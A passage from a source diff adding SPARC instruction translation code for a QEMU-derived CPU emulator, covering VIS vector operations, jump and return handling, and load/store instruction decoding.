VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_alignaddr(dc, cpu_dst, cpu_src1, cpu_src2, 0); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x01a: /* VIS I alignaddrl */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_alignaddr(dc, cpu_dst, cpu_src1, cpu_src2, 1); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x019: /* VIS II bmask */ + CHECK_FPU_FEATURE(dc, VIS2); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + tcg_gen_add_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + tcg_gen_deposit_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_gsr, *(TCGv *)tcg_ctx->cpu_gsr, cpu_dst, 32, 32); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x020: /* VIS I fcmple16 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_helper_fcmple16(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x022: /* VIS I fcmpne16 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_helper_fcmpne16(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x024: /* VIS I fcmple32 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_helper_fcmple32(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x026: /* VIS I fcmpne32 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_helper_fcmpne32(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x028: /* VIS I fcmpgt16 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_helper_fcmpgt16(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x02a: /* VIS I fcmpeq16 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_helper_fcmpeq16(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x02c: /* VIS I fcmpgt32 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_helper_fcmpgt32(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x02e: /* VIS I fcmpeq32 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_helper_fcmpeq32(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x031: /* VIS I fmul8x16 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8x16); + break; + case 0x033: /* VIS I fmul8x16au */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8x16au); + break; + case 0x035: /* VIS I fmul8x16al */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8x16al); + break; + case 0x036: /* VIS I fmul8sux16 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8sux16); + break; + case 0x037: /* VIS I fmul8ulx16 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8ulx16); + break; + case 0x038: /* VIS I fmuld8sux16 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmuld8sux16); + break; + case 0x039: /* VIS I fmuld8ulx16 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmuld8ulx16); + break; + case 0x03a: /* VIS I fpack32 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_gsr_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpack32); + break; + case 0x03b: /* VIS I fpack16 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs2); + cpu_dst_32 = gen_dest_fpr_F(dc); + gen_helper_fpack16(tcg_ctx, cpu_dst_32, *(TCGv *)tcg_ctx->cpu_gsr, cpu_src1_64); + gen_store_fpr_F(dc, rd, cpu_dst_32); + break; + case 0x03d: /* VIS I fpackfix */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs2); + cpu_dst_32 = gen_dest_fpr_F(dc); + gen_helper_fpackfix(tcg_ctx, cpu_dst_32, *(TCGv *)tcg_ctx->cpu_gsr, cpu_src1_64); + gen_store_fpr_F(dc, rd, cpu_dst_32); + break; + case 0x03e: /* VIS I pdist */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDDD(dc, rd, rs1, rs2, gen_helper_pdist); + break; + case 0x048: /* VIS I faligndata */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_gsr_fop_DDD(dc, rd, rs1, rs2, gen_faligndata); + break; + case 0x04b: /* VIS I fpmerge */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpmerge); + break; + case 0x04c: /* VIS II bshuffle */ + CHECK_FPU_FEATURE(dc, VIS2); + gen_gsr_fop_DDD(dc, rd, rs1, rs2, gen_helper_bshuffle); + break; + case 0x04d: /* VIS I fexpand */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fexpand); + break; + case 0x050: /* VIS I fpadd16 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpadd16); + break; + case 0x051: /* VIS I fpadd16s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, gen_helper_fpadd16s); + break; + case 0x052: /* VIS I fpadd32 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpadd32); + break; + case 0x053: /* VIS I fpadd32s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_add_i32); + break; + case 0x054: /* VIS I fpsub16 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpsub16); + break; + case 0x055: /* VIS I fpsub16s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, gen_helper_fpsub16s); + break; + case 0x056: /* VIS I fpsub32 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpsub32); + break; + case 0x057: /* VIS I fpsub32s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_sub_i32); + break; + case 0x060: /* VIS I fzero */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_dst_64 = gen_dest_fpr_D(dc, rd); + tcg_gen_movi_i64(tcg_ctx, cpu_dst_64, 0); + gen_store_fpr_D(dc, rd, cpu_dst_64); + break; + case 0x061: /* VIS I fzeros */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_dst_32 = gen_dest_fpr_F(dc); + tcg_gen_movi_i32(tcg_ctx, cpu_dst_32, 0); + gen_store_fpr_F(dc, rd, cpu_dst_32); + break; + case 0x062: /* VIS I fnor */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_nor_i64); + break; + case 0x063: /* VIS I fnors */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_nor_i32); + break; + case 0x064: /* VIS I fandnot2 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_andc_i64); + break; + case 0x065: /* VIS I fandnot2s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_andc_i32); + break; + case 0x066: /* VIS I fnot2 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DD(dc, rd, rs2, tcg_gen_not_i64); + break; + case 0x067: /* VIS I fnot2s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FF(dc, rd, rs2, tcg_gen_not_i32); + break; + case 0x068: /* VIS I fandnot1 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs2, rs1, tcg_gen_andc_i64); + break; + case 0x069: /* VIS I fandnot1s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs2, rs1, tcg_gen_andc_i32); + break; + case 0x06a: /* VIS I fnot1 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DD(dc, rd, rs1, tcg_gen_not_i64); + break; + case 0x06b: /* VIS I fnot1s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FF(dc, rd, rs1, tcg_gen_not_i32); + break; + case 0x06c: /* VIS I fxor */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_xor_i64); + break; + case 0x06d: /* VIS I fxors */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_xor_i32); + break; + case 0x06e: /* VIS I fnand */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_nand_i64); + break; + case 0x06f: /* VIS I fnands */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_nand_i32); + break; + case 0x070: /* VIS I fand */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_and_i64); + break; + case 0x071: /* VIS I fands */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_and_i32); + break; + case 0x072: /* VIS I fxnor */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_eqv_i64); + break; + case 0x073: /* VIS I fxnors */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_eqv_i32); + break; + case 0x074: /* VIS I fsrc1 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + gen_store_fpr_D(dc, rd, cpu_src1_64); + break; + case 0x075: /* VIS I fsrc1s */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_32 = gen_load_fpr_F(dc, rs1); + gen_store_fpr_F(dc, rd, cpu_src1_32); + break; + case 0x076: /* VIS I fornot2 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_orc_i64); + break; + case 0x077: /* VIS I fornot2s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_orc_i32); + break; + case 0x078: /* VIS I fsrc2 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs2); + gen_store_fpr_D(dc, rd, cpu_src1_64); + break; + case 0x079: /* VIS I fsrc2s */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_32 = gen_load_fpr_F(dc, rs2); + gen_store_fpr_F(dc, rd, cpu_src1_32); + break; + case 0x07a: /* VIS I fornot1 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs2, rs1, tcg_gen_orc_i64); + break; + case 0x07b: /* VIS I fornot1s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs2, rs1, tcg_gen_orc_i32); + break; + case 0x07c: /* VIS I for */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_or_i64); + break; + case 0x07d: /* VIS I fors */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_or_i32); + break; + case 0x07e: /* VIS I fone */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_dst_64 = gen_dest_fpr_D(dc, rd); + tcg_gen_movi_i64(tcg_ctx, cpu_dst_64, -1); + gen_store_fpr_D(dc, rd, cpu_dst_64); + break; + case 0x07f: /* VIS I fones */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_dst_32 = gen_dest_fpr_F(dc); + tcg_gen_movi_i32(tcg_ctx, cpu_dst_32, -1); + gen_store_fpr_F(dc, rd, cpu_dst_32); + break; + case 0x080: /* VIS I shutdown */ + case 0x081: /* VIS II siam */ + // XXX + goto illegal_insn; + default: + goto illegal_insn; + } +#else + goto ncp_insn; +#endif + } else if (xop == 0x37) { /* V8 CPop2, V9 impdep2 */ +#ifdef TARGET_SPARC64 + goto illegal_insn; +#else + goto ncp_insn; +#endif +#ifdef TARGET_SPARC64 + } else if (xop == 0x39) { /* V9 return */ + TCGv_i32 r_const; + + save_state(dc); + cpu_src1 = get_src1(dc, insn); + cpu_tmp0 = get_temp_tl(dc); + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 19, 31); + tcg_gen_addi_tl(tcg_ctx, cpu_tmp0, cpu_src1, simm); + } else { /* register */ + rs2 = GET_FIELD(insn, 27, 31); + if (rs2) { + cpu_src2 = gen_load_gpr(dc, rs2); + tcg_gen_add_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + } else { + tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, cpu_src1); + } + } + gen_helper_restore(tcg_ctx, tcg_ctx->cpu_env); + gen_mov_pc_npc(dc); + r_const = tcg_const_i32(tcg_ctx, 3); + gen_helper_check_align(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_npc, cpu_tmp0); + dc->npc = DYNAMIC_PC; + goto jmp_insn; +#endif + } else { + cpu_src1 = get_src1(dc, insn); + cpu_tmp0 = get_temp_tl(dc); + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 19, 31); + tcg_gen_addi_tl(tcg_ctx, cpu_tmp0, cpu_src1, simm); + } else { /* register */ + rs2 = GET_FIELD(insn, 27, 31); + if (rs2) { + cpu_src2 = gen_load_gpr(dc, rs2); + tcg_gen_add_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + } else { + tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, cpu_src1); + } + } + switch (xop) { + case 0x38: /* jmpl */ + { + TCGv t; + TCGv_i32 r_const; + + t = gen_dest_gpr(dc, rd); + tcg_gen_movi_tl(tcg_ctx, t, dc->pc); + gen_store_gpr(dc, rd, t); + gen_mov_pc_npc(dc); + r_const = tcg_const_i32(tcg_ctx, 3); + gen_helper_check_align(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + gen_address_mask(dc, cpu_tmp0); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_npc, cpu_tmp0); + dc->npc = DYNAMIC_PC; + } + goto jmp_insn; +#if !defined(CONFIG_USER_ONLY) && !defined(TARGET_SPARC64) + case 0x39: /* rett, V9 return */ + { + TCGv_i32 r_const; + + if (!supervisor(dc)) + goto priv_insn; + gen_mov_pc_npc(dc); + r_const = tcg_const_i32(tcg_ctx, 3); + gen_helper_check_align(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_npc, cpu_tmp0); + dc->npc = DYNAMIC_PC; + gen_helper_rett(tcg_ctx, tcg_ctx->cpu_env); + } + goto jmp_insn; +#endif + case 0x3b: /* flush */ + if (!((dc)->def->features & CPU_FEATURE_FLUSH)) + goto unimp_flush; + /* nop */ + break; + case 0x3c: /* save */ + save_state(dc); + gen_helper_save(tcg_ctx, tcg_ctx->cpu_env); + gen_store_gpr(dc, rd, cpu_tmp0); + break; + case 0x3d: /* restore */ + save_state(dc); + gen_helper_restore(tcg_ctx, tcg_ctx->cpu_env); + gen_store_gpr(dc, rd, cpu_tmp0); + break; +#if !defined(CONFIG_USER_ONLY) && defined(TARGET_SPARC64) + case 0x3e: /* V9 done/retry */ + { + switch (rd) { + case 0: + if (!supervisor(dc)) + goto priv_insn; + dc->npc = DYNAMIC_PC; + dc->pc = DYNAMIC_PC; + gen_helper_done(tcg_ctx, tcg_ctx->cpu_env); + goto jmp_insn; + case 1: + if (!supervisor(dc)) + goto priv_insn; + dc->npc = DYNAMIC_PC; + dc->pc = DYNAMIC_PC; + gen_helper_retry(tcg_ctx, tcg_ctx->cpu_env); + goto jmp_insn; + default: + goto illegal_insn; + } + } + break; +#endif + default: + goto illegal_insn; + } + } + break; + } + break; + case 3: /* load/store instructions */ + { + unsigned int xop = GET_FIELD(insn, 7, 12); + /* ??? gen_address_mask prevents us from using a source + register directly. Always generate a temporary. */ + TCGv cpu_addr = get_temp_tl(dc); + + tcg_gen_mov_tl(tcg_ctx, cpu_addr, get_src1(dc, insn)); + if (xop == 0x3c || xop == 0x3e) { + /* V9 casa/casxa : no offset */ + } else if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 19, 31); + if (simm != 0) { + tcg_gen_addi_tl(tcg_ctx, cpu_addr, cpu_addr, simm); + } + } else { /* register */ + rs2 = GET_FIELD(insn, 27, 31); + if (rs2 != 0) { + tcg_gen_add_tl(tcg_ctx, cpu_addr, cpu_addr, gen_load_gpr(dc, rs2)); + } + } + if (xop < 4 || (xop > 7 && xop < 0x14 && xop != 0x0e) || + (xop > 0x17 && xop <= 0x1d ) || + (xop > 0x2c && xop <= 0x33) || xop == 0x1f || xop == 0x3d) { + TCGv cpu_val = gen_dest_gpr(dc, rd); + + switch (xop) { + case 0x0: /* ld, V9 lduw, load unsigned word */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_ld32u(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0x1: /* ldub, load unsigned byte */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_ld8u(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0x2: /* lduh, load unsigned halfword */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_ld16u(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0x3: /* ldd, load double word */ + if (rd & 1) + goto illegal_insn; + else { + TCGv_i32 r_const; + TCGv_i64 t64; + + save_state(dc); + r_const = tcg_const_i32(tcg_ctx, 7); + /* XXX remove alignment check */ + gen_helper_check_align(tcg_ctx, tcg_ctx->cpu_env, cpu_addr, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + gen_address_mask(dc, cpu_addr); + t64 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_qemu_ld64(dc->uc, t64, cpu_addr, dc->mem_idx); + tcg_gen_trunc_i64_tl(tcg_ctx, cpu_val, t64); + tcg_gen_ext32u_tl(tcg_ctx, cpu_val, cpu_val); + gen_store_gpr(dc, rd + 1, cpu_val); + tcg_gen_shri_i64(tcg_ctx, t64, t64, 32); + tcg_gen_trunc_i64_tl(tcg_ctx, cpu_val, t64); + tcg_temp_free_i64(tcg_ctx, t64); + tcg_gen_ext32u_tl(tcg_ctx, cpu_val, cpu_val); + } + break; + case 0x9: /* ldsb, load signed byte */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_ld8s(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0xa: /* ldsh, load signed halfword */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_ld16s(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0xd: /* ldstub -- XXX: should be atomically */ + { + TCGv r_const; + + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_ld8s(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + r_const = tcg_const_tl(tcg_ctx, 0xff); + tcg_gen_qemu_st8(dc->uc, r_const, cpu_addr, dc->mem_idx); + tcg_temp_free(tcg_ctx, r_const); + } + break; + case 0x0f: + /* swap, swap register with memory. Also atomically */ + { + TCGv t0 = get_temp_tl(dc); + CHECK_IU_FEATURE(dc, SWAP); + cpu_src1 = gen_load_gpr(dc, rd); + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_ld32u(dc->uc, t0, cpu_addr, dc->mem_idx); + tcg_gen_qemu_st32(dc->uc, cpu_src1, cpu_addr, dc->mem_idx); + tcg_gen_mov_tl(tcg_ctx, cpu_val, t0); + } + break; +#if !defined(CONFIG_USER_ONLY) || defined(TARGET_SPARC64) + case 0x10: /* lda, V9 lduwa, load word alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + gen_ld_asi(dc, cpu_val, cpu_addr, insn, 4, 0); + break; + case 0x11: /* lduba, load unsigned byte alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + gen_ld_asi(dc, cpu_val, cpu_addr, insn, 1, 0); + break; + case 0x12: /* lduha, load unsigned halfword alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + gen_ld_asi(dc, cpu_val, cpu_addr, insn, 2, 0); + break; + case 0x13: /* ldda, load double word alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + if (rd & 1) + goto illegal_insn; + save_state(dc); + gen_ldda_asi(dc, cpu_val, cpu_addr, insn, rd); + goto skip_move; + case 0x19: /* ldsba, load signed byte alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + gen_ld_asi(dc, cpu_val, cpu_addr, insn, 1, 1); + break; + case 0x1a: /* ldsha, load signed halfword alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + gen_ld_asi(dc, cpu_val, cpu_addr, insn, 2, 1); + break; + case 0x1d: /* ldstuba -- XXX: should be atomically */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + gen_ldstub_asi(dc, cpu_val, cpu_addr, insn); + break; + case 0x1f: /* swapa, swap reg with alt. memory. Also + atomically */ + CHECK_IU_FEATURE(dc, SWAP); +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + cpu_src1 = gen_load_gpr(dc, rd); + gen_swap_asi(dc, cpu_val, cpu_src1, cpu_addr, insn); + break; + +#ifndef TARGET_SPARC64 + case 0x30: /* ldc */ + case 0x31: /* ldcsr */ + case 0x33: /* lddc */ + goto ncp_insn; +#endif +#endif +#ifdef TARGET_SPARC64 + case 0x08: /* V9 ldsw */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_ld32s(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0x0b: /* V9 ldx */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_ld64(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0x18: /* V9 ldswa */ + save_state(dc); + gen_ld_asi(dc, cpu_val, cpu_addr, insn, 4, 1); + break; + case 0x1b: /* V9 ldxa */ + save_state(dc); + gen_ld_asi(dc, cpu_val, cpu_addr, insn, 8, 0); + break; + case 0x2d: /* V9 prefetch, no effect */ + goto skip_move; + case 0x30: /* V9 ldfa */ + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + save_state(dc); + gen_ldf_asi(dc, cpu_addr, insn, 4, rd); + gen_update_fprs_dirty(dc, rd); + goto skip_move; + case 0x33: /* V9 lddfa */ + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + save_state(dc); + gen_ldf_asi(dc, cpu_addr, insn, 8, DFPREG(rd)); + gen_update_fprs_dirty(dc, DFPREG(rd)); + goto skip_move; + case 0x3d: /* V9 prefetcha, no effect */ + goto skip_move; + case 0x32: /* V9 ldqfa */ + CHECK_FPU_FEATURE(dc, FLOAT128); + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + save_state(dc); + gen_ldf_asi(dc, cpu_addr, insn, 16, QFPREG(rd)); + gen_update_fprs_dirty(dc, QFPREG(rd)); + goto skip_move; +#endif + default: + goto illegal_insn; + } + gen_store_gpr(dc, rd, cpu_val); +#if !defined(CONFIG_USER_ONLY) || defined(TARGET_SPARC64) + skip_move: ; +#endif + } else if (xop >= 0x20 && xop < 0x24) { + TCGv t0; + + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + save_state(dc); + switch (xop) { + case 0x20: /* ldf, load fpreg */ + gen_address_mask(dc, cpu_addr); + t0 = get_temp_tl(dc); + tcg_gen_qemu_ld32u(dc->uc, t0, cpu_addr, dc->mem_idx); + cpu_dst_32 = gen_dest_fpr_F(dc); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_dst_32, t0); + gen_store_fpr_F(dc, rd, cpu_dst_32); + break; + case 0x21: /* ldfsr, V9 ldxfsr */ +#ifdef TARGET_SPARC64 + gen_address_mask(dc, cpu_addr); + if (rd == 1) { + TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_qemu_ld64(dc->uc, t64, cpu_addr, dc->mem_idx); + gen_helper_ldxfsr(tcg_ctx, tcg_ctx->cpu_env, t64); + tcg_temp_free_i64(tcg_ctx, t64); + break; + } +#endif + cpu_dst_32 = get_temp_i32(dc); + t0 = get_temp_tl(dc); + tcg_gen_qemu_ld32u(dc->uc, t0, cpu_addr, dc->mem_idx); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_dst_32, t0); + gen_helper_ldfsr(tcg_ctx, tcg_ctx->cpu_env, cpu_dst_32); + break; + case 0x22: /* ldqf, load quad fpreg */ + { + TCGv_i32 r_const; + + CHECK_FPU_FEATURE(dc, FLOAT128); + r_const = tcg_const_i32(tcg_ctx, dc->mem_idx); + gen_address_mask(dc, cpu_addr); + gen_helper_ldqf(tcg_ctx, tcg_ctx->cpu_env, cpu_addr, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + gen_op_store_QT0_fpr(dc, QFPREG(rd)); + gen_update_fprs_dirty(dc, QFPREG(rd)); + } + break; + case 0x23: /* lddf, load double fpreg */ + gen_address_mask(dc, cpu_addr); + cpu_dst_64 = gen_dest_fpr_D(dc, rd); + tcg_gen_qemu_ld64(dc->uc, cpu_dst_64, cpu_addr, dc->mem_idx); + gen_store_fpr_D(dc, rd, cpu_dst_64); + break; + default: + goto illegal_insn; + } + } else if (xop < 8 || (xop >= 0x14 && xop < 0x18) || + xop == 0xe || xop == 0x1e) { + TCGv cpu_val = gen_load_gpr(dc, rd); + + switch (xop) { + case 0x4: /* st, store word */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_st32(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0x5: /* stb, store byte */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_st8(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0x6: /* sth, store halfword */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_st16(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0x7: /* std, store double word */ + if (rd & 1) + goto illegal_insn; + else { + TCGv_i32 r_const; + TCGv_i64 t64; + TCGv lo; + + save_state(dc); + gen_address_mask(dc, cpu_addr); + r_const = tcg_const_i32(tcg_ctx, 7); + /* XXX remove 